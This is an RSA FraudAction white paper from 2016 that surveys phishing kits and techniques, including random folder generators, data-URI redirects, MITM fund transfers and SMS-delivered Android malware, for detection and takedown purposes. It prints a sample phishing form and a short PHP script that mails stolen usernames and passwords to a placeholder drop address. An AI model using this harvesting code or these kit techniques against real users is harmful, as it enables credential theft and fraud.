RSA FraudAction Intelligence A DECADE OF PHISHING. November 2016

Size: px
Start display at page:

Download "RSA FraudAction Intelligence A DECADE OF PHISHING. November 2016"

Transcription

1 RSA FraudAction Intelligence A DECADE OF PHISHING November 2016

2 TABLE OF CONTENTS Introduction... 3 How to Set up a Phishing Campaign... 3 Fundamentals... 3 How Does Phishing Work in the Real World?... 4 Motivation - How Do fraudsters Cash Out?... 5 The Many Schemes and Techniques of Phishing... 5 The Tax Refund Ploy - Multi-branded Phishing... 5 Bulk Phishing Campaigns... 5 Random Folder Generators... 6 Local HTML Scheme... 8 BASE64 encoded Phishing in a URL... 9 Phishing with MITM capabilities... 9 Phishing Plus Mobile Malware in India Fast-Flux Phishing Additional Phishing Techniques

3 INTRODUCTION Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have investigated, and also explains the techniques and inner workings of some recently seen schemes. HOW TO SET UP A PHISHING CAMPAIGN There is nothing complicated about setting up a phishing campaign. Phishing sites, like any website, require a hosting facility (domain, IP address, etc.) as well as a software front-end and back-end (HTML, PHP etc.). Anyone with a little knowledge in web-development can set up a phishing site without a hassle. Simple phishing sites are generally simple copies of legitimate customer login pages (front-end), where the action script (that handles the submitted information) is different from the legitimate one. Owing to this simplicity in the preparation process, phishing was, is, and will probably remain one of the most desirable scam techniques performed by fraudsters. FUNDAMENTALS What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the help of additional client-side scripting/markup languages such as JavaScript and CSS. These components are responsible for presenting text, pictures, and other graphics. In addition, PHP (Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to perform programming tasks, and fraudsters love it! PHP is a relatively simple to write server-side scripting language, and it is used by most websites today. In every phishing site, there is an information form that victims are prompted to fill with requested details. In HTML, forms are composed like the following example: <form method= POST action= getdata.php > Username: <input type= text name= username /> <br/> Password: <input type= password name= password /> <br/><br/> <input type= submit value= Login /> </form> The example login form above contains two data fields: Username and Password, defined by the input tag. The third input has a type defined as submit with a value defined as Login this means that it will appear on the login screen as a submit button labeled Login. The form tags at the beginning and end of the script define a form with these fields. The form tag attributes method and action determine how the data is going to be handled when victim clicks the Login button the data will be submitted to the getdata.php handling script via an HTTP POST request. How do fraudsters usually prepare all of the above? They copy the HTML source code of a legitimate site s pages, and change the action attribute to a script they ve written (usually in PHP). The easy method is just to get the submitted data and forward it to fraudster s address (a.k.a. the drop ). Here s an example of a getdata.php script: <?php $username = $_POST[ username ]; $password = $_POST[ password ]; 3

4 $message = -----[Best HaXoR Ever]-----\n ; $message.= Username: $username\n ; $message.= Password: $password\n ; $message.= -----[Best HaXoR Ever]-----\n ; $subject = Phished data ; mail( besthaxor@drop .com, $subject, $message);?> Although most phishing sites still work in this simplified manner, during the last decade we ve seen more advanced phishing techniques develop and evolve. HOW DOES PHISHING WORK IN THE REAL WORLD? Being a simple way to do fraud, phishing usually doesn t attract sophisticated threat actors. In some cases, they don t even possess any programming knowledge. Phishing sites are commonly distributed in underground forums as kits packaged as archive files (ZIP, RAR, etc.) that contain all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop s in the relevant files of the kit. It is very comfortable and easy for them to use. However, distributors or kit developers don t spend their precious time just to make their clients the fraudsters happy. Many of the kits we have investigated contain hidden or obfuscated code that forwards the stolen data back to the kit s author as well as to the end-user fraudster. So, for example, if 100 fraudsters use these infected kits distributed by single kit author, he stands to harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online 100 times himself. Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to make it available online. Here are two commonly used options for deployment: Use a hacked website Buy a site/domain The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either hacks it himself, or buys it in underground forums/shops selling compromised sites. The vendor of such a site provides the fraudster with a link to a backdoor script (also in PHP) also known as a shell that allows them to control and manage the site, uploading and deploying the phishing kit resources. When a fraudster has the phishing URL ready (deployed kit on hijacked website), he needs to distribute it to potential victims. Distribution of phishing URLs is commonly performed via messages. However, occasionally fraudsters can be more creative and use additional distribution vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of addresses are traded and sold in underground forums, and often the price depends on how good that list is. For example, how close a match there is between the addresses of people from a geographic area that matches the targeted entity, and how many of them are active or online, can affect the price. If fraudster is targeting a British bank, a verified active address owned by British citizens will fetch a higher price. 4

5 MOTIVATION - HOW DO FRAUDSTERS CASH OUT? Not every financial institution becomes a fraudster s target. The main qualifying factor is either a security flaw in the target site, and/or the ease of cashing out or monetizing the phishing process. For example, knowing that phishing for PII (Personally Identifiable Information) data such as mother s maiden name and date of birth tied together with other personal details can help in transferring money from a victim s account elsewhere - will definitely draw a scammer s attention. Another option is fraudsters selling stolen data in the underground rather than trying to cash-out the scam by themselves. This also offers the advantage of avoiding drawing attention from law enforcement authorities and company security departments. The buyers are usually people who are well versed with how to cash-out, and are also willing to take on the risks involved. One more option is fraudsters collaborating with money-mules. The money is transferred to a mule account, and the money mule cashes it out for a fee. After the transfer is done, the mules go to an ATM, draw the stolen money, and transfer it back to the first fraudster via a money transferring service (Western Union, MoneyGram etc.). Another cashout scheme is purchasing various products online using stolen credentials, and then re-selling the items. These are just few examples of common cashout techniques. THE MANY SCHEMES AND TECHNIQUES OF PHISHING THE TAX REFUND PLOY - MULTI-BRANDED PHISHING One phishing scam that Phishers love to use is to bait victims with a supposed tax refund notification via - pretending to come from an official government tax/revenue service in different countries. When victims follow the link, they see a phishing website that has the same look and feel of the legitimate revenue service site of their country, with a list of all the banks in that region. The victim is prompted to select their bank and enter personal information to receive a refund. This ploy enables fraudsters to steal data from customers at several banks at once and increase their fraud coverage. BULK PHISHING CAMPAIGNS Another popular trend is performing phishing campaigns in bulk form. This means that rather than deploying a single phishing website that is eventually sent to victims, fraudsters deploy them in bulk, and distribute URLs randomly among phishing s. This tactic increases the phishing site s lifespan and makes the detection and shutdown process a bit harder. Contrary to a usual phishing site where the scammers use one or two hijacked websites to deploy a phishing kit, the bulk scheme could encompass dozens of hijacked websites with several phishing directories on each one, resulting in hundreds of phishing websites. For example:

6 Detecting one or two of these URLs and shutting them down can still leave other URLs online. The randomly generated folder names in these phishing URLs makes them much harder to detect. Needless to say, when fraudsters host the phishing attacks on domains that they bought, it complicates the handling of such attacks as there is little or no cooperation from domain registrants in trying to shut down phishing sites. On the other hand, hijacked website registrants are often more willing to cooperate and cease the abuse of their websites. These phishing campaigns are often orchestrated by several threat actors. RANDOM FOLDER GENERATORS Some of the newer phishing kits have been observed to generate a new randomized phishing URI for each new victim accessing the primary phishing link. The victims receive a link (by or another distribution method) the redirects them to a folder-generating script. Once the victim accesses the link, a fresh (URI) folder is generated on the fly, resulting in a personal phishing site dedicated to this instance and this victim. The folders are usually named with a random sequence of characters, often using the IP address or address of the victim. In some cases, the entire folder is deleted as soon as the victim completes entering all of the requested personal information, and the data is sent off to a phishing drop site or address. 6

7 Here is a generic example - the initial link in the phishing looks like this: The PHP code in the snapshot below is an example of a random folder-generating script. Random name generating function Randomize the name some more Logging every access in file including IP, date, and browser type File copying function Base directory - contents are copied from here Copy the contents to generated folder and redirect to it index.php is a PHP script that creates a random folder and copies all the required resource files from the phishing kit (html, js, css, images, etc.) to a newly created folder per victim access. In some cases, instead of a new folder, the index.php script extracts these files from a ZIP archive sitting in the base directory of the phishing campaign, and deploys them as is, using the name of the archive folder. Phishing Victim follows a folder-generating URL Foldergenerating script New randomly-named folder is generated Required files are copied from base directory to new folder Victim is redirected to newly generated URL Newly generated folder Phishing site is presented to victim 7

8 This scheme is simple to operate, but it complicates detection and shutdown efforts much like other schemes described here. When one randomly deployed phishing URL is detected, it might be deleted in minutes, which can mislead security personnel into thinking that the site has been brought down. In actual fact, the site remains active and online, simply waiting for a new victim to access the initial link. In order to handle these cases effectively, it is crucial to detect and shutdown the base directory (or archive) that contains initial phishing site and resources. LOCAL HTML SCHEME The phishing scheme that is commonly called Local HTML involves an HTML file that is attached to an message. Victims are prompted to open it and fill out their personal data. The phishing site contents are placed in a single HTML file (except for the data handling script and drop point URL that are incorporated in the form tag action attribute described earlier). The script can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website. In both cases, the data is usually sent to the fraudster s drop . Below is a snapshot of Part of a Local HTML contents (form) with a remote drop point URL From a cyber-security perspective, it may be difficult to shut-down the site when the drop script is hosted on a hijacked website, as it doesn t present any abusive content when it is viewed (a blank page is normally displayed), causing hosting facilities to think it is offline. On the other hand, online form services are more cooperative in shutting down fraudster accounts. 8

9 BASE64 ENCODED PHISHING IN A URL Most major browsers today support a feature called data URI scheme. This feature enables encoding the webpage content with BASE64 encoding into a string seen in browser address bar. Fraudsters like using this encoding feature in the Local HTML phishing scheme, as well as in regular online hosted phishing. When hosted online, it helps scammers to conceal the main phishing URL. The data URI is injected into the address bar using the JavaScript s window.location property or the HTML meta-refresh. The screenshot below shows the data URI as it appears in address bar. This is an example of the script for injecting the data URI into the browser address bar. PHISHING WITH MITM CAPABILITIES Phishing schemes with Man-In-The-Middle (MitM) capabilities are more sophisticated than most, and provide fraudsters with more accurate harvested credentials. Phishing with MITM means that while the victim is interacting with a phishing site, behind the scenes and not visible to the victim, the phishing site communicates with and performs actions on the legitimate site. This capability is implemented with PHP curl module. The curl is used to transfer data through various protocols including HTTP. To develop a script that imitates the user s actions on a legitimate site, some reverse engineering is required on the part of the fraudster to understand which requests and data are forwarded to the legitimate site. 9

10 Below is a code sample illustrating the curl object used for communicating with the legitimate online-banking site. The script in the snapshot below is a curl class used for communicating with the legitimate online banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080). 10

11 The config.php in the snapshot below contains the fraudster s account used to receive the stolen funds transfer. Another part of the phishing script, seen below, uses the curl object to transfer funds from the victim s account to the fraudster s account ($cuenta_destino is defined in the config.php shown above) The MITM phishing scheme offers a fraudster many advantages the fraudster can: Login to the legitimate site to check the validity of stolen credentials Browse the victim s account after login to view the account balance Grab additional personal information such as phone number, address, etc. In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing site s original IP address and use the desired country IP to match that of the victim s locale. This results in a low profile in fraud monitoring system logs that flag suspicious activity if actions carried out on the legitimate site are detected as originating from a region other than the customer s or the financial institution s website locale. Moreover, there are cases where the phishing kit checked the victim s account balance, and when it was higher than a given amount, it transferred the funds to a mule account at the same bank through the legitimate site. These kits/phishing sites are relatively rare as they require higher level coding skills and reverse engineering of the legitimate websites. In the best case scenario, MITM phishing only steals valid credentials. In the worst case scenario, the funds in the account are transferred out almost instantly, making it a very serious threat in cyber-space. 11

12 PHISHING PLUS MOBILE MALWARE IN INDIA Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The Tax Refund scheme described earlier, that operates via a spoofed government revenue service site, was recently modified to include an SMS message sent to the victim s phone at the end of the phishing process. The SMS contains a link that downloads and deploys a malicious APK (Android mobile malware archive). Phishing Victim clicks on redirection link Redirection Victim is redirected to outer-frame URL The redirecting source-code is obfuscated with Unescape Redirecting code executes using data URI Outer-frame Communicates with SQL database to get inner-frame URL Presents inner-frame hosted on URL different from outer-frame Inner-frame (foldergenarator) Randomly named folder is generated in random parent directory Victim is redirected to a new folder Phishing site Victim is prompted to select a bank Victim is prompted to enter personal data including phone number Compromised data is sent to remote drop URL Victim receives short-url link via SMS The link leads to URL for downloading malicious Andoid application Once APK is installed, victim's data on smartphone iscompromised This new ploy makes use of a number of schemes and techniques described earlier, including a random folder generator, BASE64 data URI, tax-refund scheme, and more. The link provided in the phishing s leads victims to a redirection URL (performed via the BASE64 data URI). That URL leads to an outer-frame site, using a script that communicates with a remote SQL database to retrieve the inner-frame URL. 12

13 The snapshot below shows part of the outer-frame code communicating with a remote SQL database. The inner-frame phishing URL generates a random folder in a random parent directory, which is different from the usual folder-generators that create a new folder under the same path. The phishing site prompts the victims to choose their bank from a long list of Indian banks to begin the tax-refund process. The image below shows the bank selection screen in the phishing site. 13

14 The kit uses a configuration file containing URLs for the resources needed by the phishing site: A URL to provide all of the images needed to spoof the legitimate site, instead of grabbing the images from the legitimate site which can trigger detection A drop URL that receives and logs stolen data A URL with the SMS sending script for the malicious APK A short URL that is sent to victims The last page file that victims see at the end of the phishing process The code snapshot below is an example of the phishing site configuration file. Once the victim finishes going through all the phishing pages, the folder is deleted. To add further spice to this scheme, upon entering their phone number in this site, the victim receives an SMS message with a link prompting the download of a malicious APK file (Android application) under the pretense of mobile verification. The random URL generation where links are deleted and created per victim complicates detection and shut-down by cyber security services. The impact of this trend is beyond regular phishing, since at the end of the process, the victim s phone is infected by a malicious application. That mobile malware application keeps on stealing data from the phone long after the personal data has been phished via a simple phishing site. Since many banks today employ two-factor authentication using SMS messages for online banking, this malicious app can be even more harmful allowing the fraudster control over the phone and the second channel for authentication. 14

15 FAST-FLUX PHISHING One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated are commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late). These are usually phishing sites hosted on Fast-Flux networks phishing attack domains that are hosted at multiple IP addresses that are randomly changed over a period of minutes. Therefore, in order to bring down these attacks, our analysts can only contact the registrars, as contacting the ISP/Hosting would not help to get to the root problem. Domains are often generated automatically in this scheme for the sole purpose of hosting phishing and malware. Each domain contained dozens of URLs targeting several entities, making campaigns very profitable for the scam authors. Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets many infected zombie computers. It involves a DNS with short TTL of its records in order to achieve IP addresses randomization. This scheme is not as common recently as it was in the past. 15

16 ADDITIONAL PHISHING TECHNIQUES In addition to the more notable and prevalent phishing schemes we have described, there are a few more techniques that are available in the phishing arsenal that are not as well known, but are still out there and are worth noting. Filtering by Geolocation and Address Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance, our analysts have witnessed phishing sites that validate their victims by comparing their address with a long list of confirmed addresses for a certain region that the fraudster obtained earlier. Some phishing s are sent with addresses embedded in the URL s parameters to make sure that only the people who received the phishing will be able to access the fraudulent site. Make sure victim s address is set in id parameter, otherwise phishing won t be shown Check whether the is in the list Check whether it is a returning victim Put it in ignore list to avoid access for second time If it passed the test, redirect to phishing page 16

17 Collecting Statistics Statistics collection is another popular feature fraudsters like to implement in their attacks. Sometimes, it is done using online services, but most of the time this feature is incorporates as part of a phishing kit. User information like screen resolution, IP address, language preferences in the browser, etc. allows fraudsters to mimic a victim s online fingerprint to try and login to their online accounts, avoiding detection of online-security monitoring solutions deployed in legitimate websites. 17

18 The 419 Scam The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly, enough people still fall victim to this simple and often humorous fictional cover story that purportedly offers to share millions of dollars with the victim, if only they first provide a small deposit to start the process Now, in order to add greater believability or a trust factor to this scam, fraudsters developed sites that imitate online banking, where the victims are given a set of prepared account credentials to login. Usually, their name is displayed after they login, and they can see that there are thousands or millions of dollars in their account. Once they gain this little measure of the victim s trust, the rest of the standard 419 scam can be played out more easily. Smartphones Always At Our Side We are now living in the smartphone era, where all sorts of tiny mobile devices with vast computing and communication abilities are always at our side fraudsters take into consideration that victims are now more attached to their than ever before. Many of us check our messages much more frequently, especially if we have a notification sound set on our device. And accordingly, more and more fraudsters modify their phishing sites to accommodate mobile browsers. Therefore, despite the rising awareness of online fraud in the general population and the media, phishing remains one of the most dangerous cyber-threats. 18

19 ABOUT RSA RSA helps more than 30,000 customers around the world take command of their security posture by partnering to build and implement business-driven security strategies. With RSA's award-winning cybersecurity solutions, organizations can effectively detect and respond to advanced attacks; manage user identities and access; and reduce business risk, fraud and cybercrime. For more information, go to ABOUT RSA FRAUDACTION RSA FraudAction is a managed threat intelligence service which provides global organizations with 24x7 protection and shutdown against phishing, malware, rogue mobile apps and other cyber attacks that impact their business. Supported by 150 analysts in RSA s Anti-Fraud Command Center, the RSA FraudAction service analyzes millions of potential threats every day and has enabled the shutdown of more than one million cyber attacks. EMC2, EMC, the EMC logo, RSA, and the RSA logo, are registered trademarks or trademarks of EMC Corporation in the United States and other countries. VMware is a registered trademark or trademark of VMware, Inc., in the United States and other jurisdictions. Copyright 2016 EMC Corporation. All rights reserved. Published in the USA.

RSA FRAUDACTION ANTI-PHISHING SERVICE: BENEFITS OF A COMPREHENSIVE MITIGATION STRATEGY

RSA FRAUDACTION ANTI-PHISHING SERVICE: BENEFITS OF A COMPREHENSIVE MITIGATION STRATEGY RSA FRAUDACTION ANTI-PHISHING SERVICE: BENEFITS OF A COMPREHENSIVE MITIGATION STRATEGY RSA CYOTA PROJECT PROPOSAL RSA FRAUDACTION ANTI-PHISHING SERVICE V.1 2011 Overview This brief highlights the benefits

More information

Vincent van Kooten, EMEA North Fraud & Risk Intelligence Specialist RSA, The Security Division of EMC

Vincent van Kooten, EMEA North Fraud & Risk Intelligence Specialist RSA, The Security Division of EMC Vincent van Kooten, EMEA North Fraud & Risk Intelligence Specialist RSA, The Security Division of EMC 1 2013 2 3 in 4 3 5.900.000.000 $ 4 RSA s Top 10 List 5 RSA s top 10 phishing list Copyright 2014 EMC

More information

ADAPTIVE AUTHENTICATION ADAPTER FOR IBM TIVOLI. Adaptive Authentication in IBM Tivoli Environments. Solution Brief

ADAPTIVE AUTHENTICATION ADAPTER FOR IBM TIVOLI. Adaptive Authentication in IBM Tivoli Environments. Solution Brief ADAPTIVE AUTHENTICATION ADAPTER FOR IBM TIVOLI Adaptive Authentication in IBM Tivoli Environments Solution Brief RSA Adaptive Authentication is a comprehensive authentication platform providing costeffective

More information

Cyber Security Guide. For Politicians and Political Parties

Cyber Security Guide. For Politicians and Political Parties Cyber Security Guide For Politicians and Political Parties Indian Election Integrity Initiative Design by ccm.design Cover Image by Paul Dufour Helping to Safeguard the Integrity of the Electoral Process

More information

Panda Security 2010 Page 1

Panda Security 2010 Page 1 Panda Security 2010 Page 1 Executive Summary The malware economy is flourishing and affecting both consumers and businesses of all sizes. The reality is that cybercrime is growing exponentially in frequency

More information

The Cost of Phishing. Understanding the True Cost Dynamics Behind Phishing Attacks A CYVEILLANCE WHITE PAPER MAY 2015

The Cost of Phishing. Understanding the True Cost Dynamics Behind Phishing Attacks A CYVEILLANCE WHITE PAPER MAY 2015 The Cost of Phishing Understanding the True Cost Dynamics Behind Phishing Attacks A CYVEILLANCE WHITE PAPER MAY 2015 Executive Summary.... 3 The Costs... 4 How To Estimate the Cost of an Attack.... 5 Table

More information

EBOOK. Stopping Fraud. How Proofpoint Helps Protect Your Organization from Impostors, Phishers and Other Non-Malware Threats.

EBOOK. Stopping  Fraud. How Proofpoint Helps Protect Your Organization from Impostors, Phishers and Other Non-Malware Threats. EBOOK Stopping Email Fraud How Proofpoint Helps Protect Your Organization from Impostors, Phishers and Other Non-Malware Threats www.proofpoint.com EBOOK Stopping Email Fraud 2 Today s email attacks have

More information

How to Fight Back against Phishing A guide to mitigating and deterring attacks targeting your customers

How to Fight Back against Phishing A guide to mitigating and deterring attacks targeting your customers White Paper How to Fight Back against Phishing A guide to mitigating and deterring attacks targeting your customers 2013 Copyright Ecrime Management Strategies, Inc. All rights reserved. PhishLabs and

More information

10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS

10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS 10 KEY WAYS THE FINANCIAL SERVICES INDUSTRY CAN COMBAT CYBER THREATS WHITE PAPER INTRODUCTION BANKS ARE A COMMON TARGET FOR CYBER CRIMINALS AND OVER THE LAST YEAR, FIREEYE HAS BEEN HELPING CUSTOMERS RESPOND

More information

Webomania Solutions Pvt. Ltd. 2017

Webomania Solutions Pvt. Ltd. 2017 The other name for link manipulation is Phishing or you can say link manipulation is type of phishing attack done generally to mislead the user to a replica website or a looka-like of some well-known site.

More information

Protecting Against Online Fraud. F5 EMEA Webinar August 2014

Protecting Against Online Fraud. F5 EMEA Webinar August 2014 Protecting Against Online Fraud F5 EMEA Webinar August 2014 Agenda Fraud threat trends and business challenges Web fraud protection Mobile fraud protection Security operations center Example architecture

More information

Adaptive Authentication Adapter for Citrix XenApp. Adaptive Authentication in Citrix XenApp Environments. Solution Brief

Adaptive Authentication Adapter for Citrix XenApp. Adaptive Authentication in Citrix XenApp Environments. Solution Brief Adaptive Authentication Adapter for Citrix XenApp Adaptive Authentication in Citrix XenApp Environments Solution Brief RSA Adaptive Authentication is a comprehensive authentication platform providing costeffective

More information

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS KASPERSKY FRAUD PREVENTION FOR ENDPOINTS www.kaspersky.com KASPERSKY FRAUD PREVENTION 1. Ways of Attacking Online Banking The prime motive behind cybercrime is making money and today s sophisticated criminal

More information

WHITE PAPER THE SOCIAL MEDIA FRAUD REVOLUTION A STUDY OF THE EXPANSION OF CYBERCRIME TO NEW PLATFORMS

WHITE PAPER THE SOCIAL MEDIA FRAUD REVOLUTION A STUDY OF THE EXPANSION OF CYBERCRIME TO NEW PLATFORMS WHITE PAPER THE SOCIAL MEDIA FRAUD REVOLUTION A STUDY OF THE EXPANSION OF CYBERCRIME TO NEW PLATFORMS Social media platforms have become one of the most visible and fastestgrowing technologies in the last

More information

Unique Phishing Attacks (2008 vs in thousands)

Unique Phishing Attacks (2008 vs in thousands) The process of attempting to acquire sensitive information, such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. In the 2 nd half

More information

WHAT IS CORPORATE ACCOUNT TAKEOVER? HOW DOES IT HAPPEN?

WHAT IS CORPORATE ACCOUNT TAKEOVER? HOW DOES IT HAPPEN? WHAT IS CORPORATE ACCOUNT TAKEOVER? Corporate Account Takeover (also referred to as CATO) is a type of fraud where criminals gain access to a business financial accounts to make unauthorized transactions.

More information

Who We Are! Natalie Timpone

Who We Are! Natalie Timpone Who We Are! Natalie Timpone Manager of Security Business Management Office Enterprise Security Awareness Manager Carmelo Walsh Security, Risk, and Compliance Security Awareness Subject Matter Expert Who

More information

CE Advanced Network Security Phishing I

CE Advanced Network Security Phishing I CE 817 - Advanced Network Security Phishing I Lecture 15 Mehdi Kharrazi Department of Computer Engineering Sharif University of Technology Acknowledgments: Some of the slides are fully or partially obtained

More information

ELECTRONIC BANKING & ONLINE AUTHENTICATION

ELECTRONIC BANKING & ONLINE AUTHENTICATION ELECTRONIC BANKING & ONLINE AUTHENTICATION How Internet fraudsters are trying to trick you What you can do to stop them How multi-factor authentication and other new techniques can help HELPING YOU STAY

More information

Cyber Hygiene Guide. Politicians and Political Parties

Cyber Hygiene Guide. Politicians and Political Parties Cyber Hygiene Guide Politicians and Political Parties Canadian Election Integrity Initiative Design by ccm.design Cover Image by Songquan Deng Helping to Safeguard the Integrity of the Electoral Process

More information

Cross-site request forgery Cross-site scripting Man-in-the-browser Session hijacking Malware Man-in-the-middle DNS cache poisoning DNS spoofing DNS hijacking Dictionary attacks DDoS DDoS Eavesdropping

More information

RSA INCIDENT RESPONSE SERVICES

RSA INCIDENT RESPONSE SERVICES RSA INCIDENT RESPONSE SERVICES Enabling early detection and rapid response EXECUTIVE SUMMARY Technical forensic analysis services RSA Incident Response services are for organizations that need rapid access

More information

Evolution of Spear Phishing. White Paper

Evolution of Spear Phishing. White Paper Evolution of Spear Phishing White Paper Executive Summary Phishing is a well-known security threat, but few people understand the difference between phishing and spear phishing. Spear phishing is the latest

More information

Issues in Using DNS Whois Data for Phishing Site Take Down

Issues in Using DNS Whois Data for Phishing Site Take Down Issues in Using DNS Whois Data for Phishing Site Take Down The Anti-Phishing Working Group DNS Policy Committee (www.antiphishing.org) May 2007 Summary Given fundamental policy changes regarding accessibility

More information

Phishing Read Behind The Lines

Phishing Read Behind The Lines Phishing Read Behind The Lines Veljko Pejović veljko@cs.ucsb.edu What is Phishing? "Phishing attacks use both social engineering and technical subterfuge to steal consumers' personal identity data and

More information

Symantec Intelligence Quarterly: Best Practices and Methodologies October - December, 2009

Symantec Intelligence Quarterly: Best Practices and Methodologies October - December, 2009 Symantec Intelligence Quarterly: Best Practices and Methodologies White Paper: Symantec Intelligence Quarterly Symantec Intelligence Quarterly: Best Practices and Methodologies Contents Symantec best

More information

Phishing Activity Trends Report August, 2006

Phishing Activity Trends Report August, 2006 Phishing Activity Trends Report, 26 Phishing is a form of online identity theft that employs both social engineering and technical subterfuge to steal consumers' personal identity data and financial account

More information

Phishing Activity Trends Report January, 2005

Phishing Activity Trends Report January, 2005 Phishing Activity Trends Report January, 2005 Phishing is a form of online identity theft that uses spoofed emails designed to lure recipients to fraudulent web sites which attempt to trick them into divulging

More information

RSA INCIDENT RESPONSE SERVICES

RSA INCIDENT RESPONSE SERVICES RSA INCIDENT RESPONSE SERVICES Enabling early detection and rapid response EXECUTIVE SUMMARY Technical forensic analysis services RSA Incident Response services are for organizations that need rapid access

More information

Quick recap on ing Security Recap on where to find things on Belvidere website & a look at the Belvidere Facebook page

Quick recap on  ing  Security Recap on where to find things on Belvidere website & a look at the Belvidere Facebook page Workshop #7 Email Security Previous workshops 1. Introduction 2. Smart phones & Tablets 3. All about WatsApp 4. More on WatsApp 5. Surfing the Internet 6. Emailing Quick recap on Emailing Email Security

More information

RSA Web Threat Detection

RSA Web Threat Detection RSA Web Threat Detection Online Threat Detection in Real Time Alaa Abdulnabi. CISSP, CIRM RSA Pre-Sales Manager, TEAM Region 1 Web Threat Landscape In the Wild Begin Session Login Transaction Logout Web

More information

Adaptive Authentication Adapter for Juniper SSL VPNs. Adaptive Authentication in Juniper SSL VPN Environments. Solution Brief

Adaptive Authentication Adapter for Juniper SSL VPNs. Adaptive Authentication in Juniper SSL VPN Environments. Solution Brief Adaptive Authentication Adapter for Juniper SSL VPNs Adaptive Authentication in Juniper SSL VPN Environments Solution Brief RSA Adaptive Authentication is a comprehensive authentication platform providing

More information

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web Security and Privacy SWE 432, Fall 2016 Design and Implementation of Software for the Web Today Security What is it? Most important types of attacks Privacy For further reading: https://www.owasp.org/index.php/

More information

Cybercrime and Information Security for Financial Institutions. AUSA Jared M. Strauss U.S. Attorney s Office So. District of Florida

Cybercrime and Information Security for Financial Institutions. AUSA Jared M. Strauss U.S. Attorney s Office So. District of Florida Cybercrime and Information Security for Financial Institutions AUSA Jared M. Strauss U.S. Attorney s Office So. District of Florida Defining Cybercrime Stealing and Monetizing Financial and Identity Data

More information

Wayward Wi-Fi. How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk

Wayward Wi-Fi. How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk Wayward Wi-Fi How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk 288 MILLION There are more than 288 million unique Wi-Fi networks worldwide. Source: Wireless Geographic Logging

More information

DIGITAL LIFE E-GUIDE. A Guide to 2013 New Year s Resolutions

DIGITAL LIFE E-GUIDE. A Guide to 2013 New Year s Resolutions A DIGITAL LIFE E-GUIDE A Guide to 2013 New Year s Resolutions 2012 is coming to a close, and what better way to prepare for the year ahead than to get our New Year s resolutions straightened out? With

More information

ITU Regional Cybersecurity Forum for Asia-Pacific

ITU Regional Cybersecurity Forum for Asia-Pacific ITU Regional Cybersecurity Forum for Asia-Pacific Incident Management Capabilities Australia Country Case Study Graham Ingram General Manager AusCERT July 2008 Copyright 2008 AusCERT Not for further distribution

More information

Account Takeover: Why Payment Fraud Protection is Not Enough

Account Takeover: Why Payment Fraud Protection is Not Enough Cybercrime Protection Account Takeover: Why Payment Fraud Protection is Not Enough Mustafa Rassiwala, ThreatMetrix, Inc. April 2014 1 Agenda 1. Customer Accounts Blessing or Curse? 2. Passwords Weakest

More information

Supercharge Your SIEM: How Domain Intelligence Enhances Situational Awareness

Supercharge Your SIEM: How Domain Intelligence Enhances Situational Awareness Supercharge Your SIEM: How Domain Intelligence Enhances Situational Awareness Introduction Drowning in data but starving for information. It s a sentiment that resonates with most security analysts. For

More information

FAQ. Usually appear to be sent from official address

FAQ. Usually appear to be sent from official  address FAQ 1. What is Phishing Email? A form of fraud by which an attacker masquerades as a reputable entity in order to obtain your personal information. Usually appear to be sent from official email address

More information

The Invisible Threat of Modern Malware Lee Gitzes, CISSP Comm Solutions Company

The Invisible Threat of Modern Malware Lee Gitzes, CISSP Comm Solutions Company The Invisible Threat of Modern Malware Lee Gitzes, CISSP Comm Solutions Company November 12, 2014 Malware s Evolution Why the change? Hacking is profitable! Breaches and Malware are Projected to Cost $491

More information

Credit Union Cyber Crisis: Gaining Awareness and Combatting Cyber Threats Without Breaking the Bank

Credit Union Cyber Crisis: Gaining Awareness and Combatting Cyber Threats Without Breaking the Bank Credit Union Cyber Crisis: Gaining Awareness and Combatting Cyber Threats Without Breaking the Bank Introduction The 6,331 credit unions in the United States face a unique challenge when it comes to cybersecurity.

More information

Author: Tonny Rabjerg Version: Company Presentation WSF 4.0 WSF 4.0

Author: Tonny Rabjerg Version: Company Presentation WSF 4.0 WSF 4.0 Author: Tonny Rabjerg Version: 20150730 Company Presentation WSF 4.0 WSF 4.0 Cybercrime is a growth industry. The returns are great, and the risks are low. We estimate that the likely annual cost to the

More information

FOR FINANCIAL SERVICES ORGANIZATIONS

FOR FINANCIAL SERVICES ORGANIZATIONS RSA BUSINESS-DRIVEN SECURITYTM FOR FINANCIAL SERVICES ORGANIZATIONS MANAGING THE NEXUS OF RISK & SECURITY A CHANGING LANDSCAPE AND A NEW APPROACH Today s financial services technology landscape is increasingly

More information

TOP TEN DNS ATTACKS PROTECTING YOUR ORGANIZATION AGAINST TODAY S FAST-GROWING THREATS

